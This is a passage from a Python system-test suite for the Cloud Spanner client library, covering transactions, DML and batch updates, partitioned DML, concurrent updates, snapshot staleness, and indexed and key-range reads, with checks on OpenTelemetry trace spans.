retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
transaction = session.transaction()
transaction.begin()
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.rollback()
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
if HAS_OPENTELEMETRY_INSTALLED:
span_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(span_list), 8)
self.assertSpanAttributes(
"CloudSpanner.CreateSession",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[0],
)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[1],
)
self.assertSpanAttributes(
"CloudSpanner.Commit",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "num_mutations": 1}
),
span=span_list[2],
)
self.assertSpanAttributes(
"CloudSpanner.BeginTransaction",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[3],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[4],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[5],
)
self.assertSpanAttributes(
"CloudSpanner.Rollback",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[6],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[7],
)
def _transaction_read_then_raise(self, transaction):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(len(rows), 0)
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
raise CustomException()
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_read_and_insert_then_exception(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with self.assertRaises(CustomException):
self._db.run_in_transaction(self._transaction_read_then_raise)
# Transaction was rolled back.
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_read_and_insert_or_update_then_commit(self):
# [START spanner_test_dml_read_your_writes]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_read_your_writes]
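# The helper below renders each ROW_DATA tuple as a literal INSERT statement,
# e.g. (first row, roughly):
#     INSERT INTO contacts (contact_id, first_name, last_name, email)
#     VALUES (1, "Phred", "Phlyntstone", "phred@example.com")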
def _generate_insert_statements(self):
insert_template = "INSERT INTO {table} ({column_list}) " "VALUES ({row_data})"
for row in self.ROW_DATA:
yield insert_template.format(
table=self.TABLE,
column_list=", ".join(self.COLUMNS),
row_data='{}, "{}", "{}", "{}"'.format(*row),
)
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_sql_w_dml_read_rollback(self):
# [START spanner_test_dml_rollback_txn_not_committed]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
transaction = session.transaction()
transaction.begin()
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
for insert_statement in self._generate_insert_statements():
result = transaction.execute_sql(insert_statement)
list(result) # iterate to get stats
self.assertEqual(result.stats.row_count_exact, 1)
# Rows inserted via DML *can* be read before commit.
during_rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(during_rows)
transaction.rollback()
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
# [END spanner_test_dml_rollback_txn_not_committed]
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_update_read_commit(self):
# [START spanner_test_dml_read_your_writes]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
for insert_statement in self._generate_insert_statements():
row_count = transaction.execute_update(insert_statement)
self.assertEqual(row_count, 1)
# Rows inserted via DML *can* be read before commit.
during_rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(during_rows)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_read_your_writes]
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_update_then_insert_commit(self):
# [START spanner_test_dml_with_mutation]
# [START spanner_test_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
row_count = transaction.execute_update(insert_statement)
self.assertEqual(row_count, 1)
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA[1:])
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_update]
# [END spanner_test_dml_with_mutation]
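# batch_update() does not raise on per-statement failures; it returns a
# google.rpc Status plus per-statement row counts, so the tests translate a
# non-OK code back into the matching google.api_core exception themselves.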
@staticmethod
def _check_batch_status(status_code, expected=code_pb2.OK):
if status_code != expected:
grpc_status_code = _STATUS_CODE_TO_GRPC_STATUS_CODE[status_code]
call = FauxCall(status_code)
raise exceptions.from_grpc_status(
grpc_status_code, "batch_update failed", errors=[call]
)
def test_transaction_batch_update_success(self):
# [START spanner_test_dml_with_mutation]
# [START spanner_test_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction, self):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), 3)
for row_count in row_counts:
self.assertEqual(row_count, 1)
session.run_in_transaction(unit_of_work, self)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
# [END spanner_test_dml_with_mutation]
# [END spanner_test_dml_update]
def test_transaction_batch_update_and_execute_dml(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statements = list(self._generate_insert_statements())
update_statements = [
(
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
]
delete_statement = "DELETE contacts WHERE TRUE;"
def unit_of_work(transaction, self):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
insert_statements + update_statements
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), len(insert_statements) + 1)
for row_count in row_counts:
self.assertEqual(row_count, 1)
row_count = transaction.execute_update(delete_statement)
self.assertEqual(row_count, len(insert_statements))
session.run_in_transaction(unit_of_work, self)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
def test_transaction_batch_update_w_syntax_error(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDTAE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code, code_pb2.INVALID_ARGUMENT)
self.assertEqual(len(row_counts), 1)
self.assertEqual(row_counts[0], 1)
session.run_in_transaction(unit_of_work)
def test_transaction_batch_update_wo_statements(self):
from google.api_core.exceptions import InvalidArgument
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.transaction() as transaction:
with self.assertRaises(InvalidArgument):
transaction.batch_update([])
def test_transaction_batch_update_w_parent_span(self):
try:
from opentelemetry import trace
except ImportError:
return
tracer = trace.get_tracer(__name__)
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction, self):
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), 3)
for row_count in row_counts:
self.assertEqual(row_count, 1)
with tracer.start_as_current_span("Test Span"):
session.run_in_transaction(unit_of_work, self)
span_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(span_list), 6)
self.assertEqual(
list(map(lambda span: span.name, span_list)),
[
"CloudSpanner.CreateSession",
"CloudSpanner.Commit",
"CloudSpanner.BeginTransaction",
"CloudSpanner.DMLTransaction",
"CloudSpanner.Commit",
"Test Span",
],
)
for span in span_list[2:-1]:
self.assertEqual(span.context.trace_id, span_list[-1].context.trace_id)
self.assertEqual(span.parent.span_id, span_list[-1].context.span_id)
def test_execute_partitioned_dml(self):
# [START spanner_test_dml_partioned_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
delete_statement = "DELETE FROM {} WHERE true".format(self.TABLE)
def _setup_table(txn):
txn.execute_update(delete_statement)
for insert_statement in self._generate_insert_statements():
txn.execute_update(insert_statement)
committed = self._db.run_in_transaction(_setup_table)
with self._db.snapshot(read_timestamp=committed) as snapshot:
before_pdml = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(before_pdml)
nonesuch = "nonesuch@example.com"
target = "phred@example.com"
update_statement = (
"UPDATE {table} SET {table}.email = @email " "WHERE {table}.email = @target"
).format(table=self.TABLE)
row_count = self._db.execute_partitioned_dml(
update_statement,
params={"email": nonesuch, "target": target},
param_types={"email": param_types.STRING, "target": param_types.STRING},
)
self.assertEqual(row_count, 1)
row = self.ROW_DATA[0]
updated = [row[:3] + (nonesuch,)] + list(self.ROW_DATA[1:])
with self._db.snapshot(read_timestamp=committed) as snapshot:
after_update = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(after_update, updated)
row_count = self._db.execute_partitioned_dml(delete_statement)
self.assertEqual(row_count, len(self.ROW_DATA))
with self._db.snapshot(read_timestamp=committed) as snapshot:
after_delete = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(after_delete, [])
# [END spanner_test_dml_partioned_dml_update]
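# Run the same read-increment-update unit of work from several threads against
# a single counter row; Cloud Spanner aborts conflicting transactions and
# run_in_transaction retries them, so the final value must reflect every
# increment.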
def _transaction_concurrency_helper(self, unit_of_work, pkey):
INITIAL_VALUE = 123
NUM_THREADS = 3 # conforms to equivalent Java systest.
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.insert_or_update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, INITIAL_VALUE]]
)
# Each thread runs its transaction through the database object, which checks
# out its own pooled session; sharing a single session across threads would fail.
txn_sessions = []
for _ in range(NUM_THREADS):
txn_sessions.append(self._db)
threads = [
threading.Thread(
target=txn_session.run_in_transaction, args=(unit_of_work, pkey)
)
for txn_session in txn_sessions
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
with self._db.snapshot() as snapshot:
keyset = KeySet(keys=[(pkey,)])
rows = list(snapshot.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
_, value = rows[0]
self.assertEqual(value, INITIAL_VALUE + len(threads))
def _read_w_concurrent_update(self, transaction, pkey):
keyset = KeySet(keys=[(pkey,)])
rows = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_read_w_concurrent_updates(self):
pkey = "read_w_concurrent_updates"
self._transaction_concurrency_helper(self._read_w_concurrent_update, pkey)
def _query_w_concurrent_update(self, transaction, pkey):
sql = "SELECT * FROM counters WHERE name = @name"
rows = list(
transaction.execute_sql(
sql, params={"name": pkey}, param_types={"name": param_types.STRING}
)
)
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_query_w_concurrent_updates(self):
pkey = "query_w_concurrent_updates"
self._transaction_concurrency_helper(self._query_w_concurrent_update, pkey)
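# _ReadAbortTrigger (presumably defined earlier in this file) coordinates two
# transactions over the counter rows so that one is aborted by the backend and
# retried; afterwards both counters must show exactly one increment each.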
@unittest.skipIf(USE_EMULATOR, "Skipping concurrent transactions")
def test_transaction_read_w_abort(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
trigger = _ReadAbortTrigger()
with self._db.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
batch.insert(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[trigger.KEY1, 0], [trigger.KEY2, 0]]
)
provoker = threading.Thread(target=trigger.provoke_abort, args=(self._db,))
handler = threading.Thread(target=trigger.handle_abort, args=(self._db,))
provoker.start()
trigger.provoker_started.wait()
handler.start()
trigger.handler_done.wait()
provoker.join()
handler.join()
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self._check_row_data(rows, expected=[[trigger.KEY1, 1], [trigger.KEY2, 1]])
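# Fixture helpers: _row_data yields deterministic contact rows keyed by index,
# and _set_up_table clears the table and inserts `row_count` of them in one
# transaction, returning the commit timestamp for timestamp-bounded reads.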
@staticmethod
def _row_data(max_index):
for index in range(max_index):
yield (
index,
"First%09d" % (index,),
"Last%09d" % (max_index - index),
"test-%09d@example.com" % (index,),
)
def _set_up_table(self, row_count, database=None):
if database is None:
database = self._db
retry = RetryInstanceState(_has_all_ddl)
retry(database.reload)()
def _unit_of_work(transaction, test):
transaction.delete(test.TABLE, test.ALL)
transaction.insert(test.TABLE, test.COLUMNS, test._row_data(row_count))
committed = database.run_in_transaction(_unit_of_work, test=self)
return committed
def test_read_with_single_keys_index(self):
# [START spanner_test_single_key_index_read]
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
row = 5
keyset = [[expected[row][0], expected[row][1]]]
with self._db.snapshot() as snapshot:
results_iter = snapshot.read(
self.TABLE, columns, KeySet(keys=keyset), index="name"
)
rows = list(results_iter)
self.assertEqual(rows, [expected[row]])
# [END spanner_test_single_key_index_read]
def test_empty_read_with_single_keys_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
keyset = [["Non", "Existent"]]
with self._db.snapshot() as snapshot:
results_iter = snapshot.read(
self.TABLE, columns, KeySet(keys=keyset), index="name"
)
rows = list(results_iter)
self.assertEqual(rows, [])
def test_read_with_multiple_keys_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, KeySet(keys=expected), index="name")
)
self.assertEqual(rows, expected)
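# Exercise each snapshot staleness mode: exact read_timestamp,
# min_read_timestamp, max_staleness, exact_staleness, and a strong read.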
def test_snapshot_read_w_various_staleness(self):
from datetime import datetime
from google.cloud._helpers import UTC
row_count = 400
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
before_reads = datetime.utcnow().replace(tzinfo=UTC)
# Test w/ read timestamp
with self._db.snapshot(read_timestamp=committed) as read_tx:
rows = list(read_tx.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ min read timestamp
with self._db.snapshot(min_read_timestamp=committed) as min_read_ts:
rows = list(min_read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
staleness = datetime.utcnow().replace(tzinfo=UTC) - before_reads
# Test w/ max staleness
with self._db.snapshot(max_staleness=staleness) as max_staleness:
rows = list(max_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ exact staleness
with self._db.snapshot(exact_staleness=staleness) as exact_staleness:
rows = list(exact_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ strong
with self._db.snapshot() as strong:
rows = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
def test_multiuse_snapshot_read_isolation_strong(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(multi_use=True) as strong:
before = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_read_timestamp(self):
row_count = 40
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(read_timestamp=committed, multi_use=True) as read_ts:
before = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_exact_staleness(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
time.sleep(1)
delta = datetime.timedelta(microseconds=1000)
with self._db.snapshot(exact_staleness=delta, multi_use=True) as exact:
before = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_read_w_index(self):
row_count = 2000
# Indexed reads cannot return non-indexed columns
MY_COLUMNS = self.COLUMNS[0], self.COLUMNS[2]
EXTRA_DDL = ["CREATE INDEX contacts_by_last_name ON contacts(last_name)"]
pool = BurstyPool(labels={"testcase": "read_w_index"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
temp_db = Config.INSTANCE.database(
"test_read" + unique_resource_id("_"),
ddl_statements=ddl_statements + EXTRA_DDL,
pool=pool,
)
operation = temp_db.create()
self.to_delete.append(_DatabaseDropper(temp_db))
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
committed = self._set_up_table(row_count, database=temp_db)
with temp_db.snapshot(read_timestamp=committed) as snapshot:
rows = list(
snapshot.read(
self.TABLE, MY_COLUMNS, self.ALL, index="contacts_by_last_name"
)
)
expected = list(
reversed([(row[0], row[2]) for row in self._row_data(row_count)])
)
self._check_rows_data(rows, expected)
def test_read_w_single_key(self):
# [START spanner_test_single_key_read]
row_count = 40
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, KeySet(keys=[(0,)])))
all_data_rows = list(self._row_data(row_count))
expected = [all_data_rows[0]]
self._check_row_data(rows, expected)
# [END spanner_test_single_key_read]
def test_empty_read(self):
# [START spanner_test_empty_read]
row_count = 40
self._set_up_table(row_count)
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, KeySet(keys=[(40,)])))
self._check_row_data(rows, [])
# [END spanner_test_empty_read]
def test_read_w_multiple_keys(self):
row_count = 40
indices = [0, 5, 17]
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(
snapshot.read(
self.TABLE,
self.COLUMNS,
KeySet(keys=[(index,) for index in indices]),
)
)
all_data_rows = list(self._row_data(row_count))
expected = [row for row in all_data_rows if row[0] in indices]
self._check_row_data(rows, expected)
def test_read_w_limit(self):
row_count = 3000
limit = 100
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL, limit=limit))
all_data_rows = list(self._row_data(row_count))
expected = all_data_rows[:limit]
self._check_row_data(rows, expected)
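# KeyRange bounds follow interval conventions: *_closed includes the endpoint
# and *_open excludes it, which is why the expected slices in the range tests
# below differ by one row at each end.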
def test_read_w_ranges(self):
row_count = 3000
start = 1000
end = 2000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
all_data_rows = list(self._row_data(row_count))
single_key = KeyRange(start_closed=[start], end_open=[start + 1])
keyset = KeySet(ranges=(single_key,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start : start + 1]
self._check_rows_data(rows, expected)
closed_closed = KeyRange(start_closed=[start], end_closed=[end])
keyset = KeySet(ranges=(closed_closed,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start : end + 1]
self._check_row_data(rows, expected)
closed_open = KeyRange(start_closed=[start], end_open=[end])
keyset = KeySet(ranges=(closed_open,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start:end]
self._check_row_data(rows, expected)
open_open = KeyRange(start_open=[start], end_open=[end])
keyset = KeySet(ranges=(open_open,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start + 1 : end]
self._check_row_data(rows, expected)
open_closed = KeyRange(start_open=[start], end_closed=[end])
keyset = KeySet(ranges=(open_closed,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start + 1 : end + 1]
self._check_row_data(rows, expected)
def test_read_partial_range_until_end(self):
row_count = 3000
start = 1000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
all_data_rows = list(self._row_data(row_count))
expected_map = {
("start_closed", "end_closed"): all_data_rows[start:],
("start_closed", "end_open"): [],
("start_open", "end_closed"): all_data_rows[start + 1 :],
("start_open", "end_open"): [],
}
for start_arg in ("start_closed", "start_open"):
for end_arg in ("end_closed", "end_open"):
range_kwargs = {start_arg: [start], end_arg: []}
keyset = KeySet(ranges=(KeyRange(**range_kwargs),))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = expected_map[(start_arg, end_arg)]
self._check_row_data(rows, expected)
def test_read_partial_range_from_beginning(self):
row_count = 3000
end = 2000
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
expected_map = {
("start_closed", "end_closed"): all_data_rows[: end + 1],
("start_closed", "end_open"): all_data_rows[:end],
("start_open", "end_closed"): [],
("start_open", "end_open"): [],
}
for start_arg in ("start_closed", "start_open"):
for end_arg in ("end_closed", "end_open"):
range_kwargs = {start_arg: [], end_arg: [end]}
keyset = KeySet(ranges=(KeyRange(**range_kwargs),))
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = expected_map[(start_arg, end_arg)]
self._check_row_data(rows, expected)
def test_read_with_range_keys_index_single_key(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start = 3
krange = KeyRange(start_closed=data[start], end_open=data[start + 1])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start : start + 1])
def test_read_with_range_keys_index_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_closed=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start : end + 1])
def test_read_with_range_keys_index_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_closed=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start:end])
def test_read_with_range_keys_index_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_open=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start + 1 : end + 1])
def test_read_with_range_keys_index_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_open=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start + 1 : end])
def test_read_with_range_keys_index_limit_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_closed=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start : end + 1]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_closed=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start:end]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
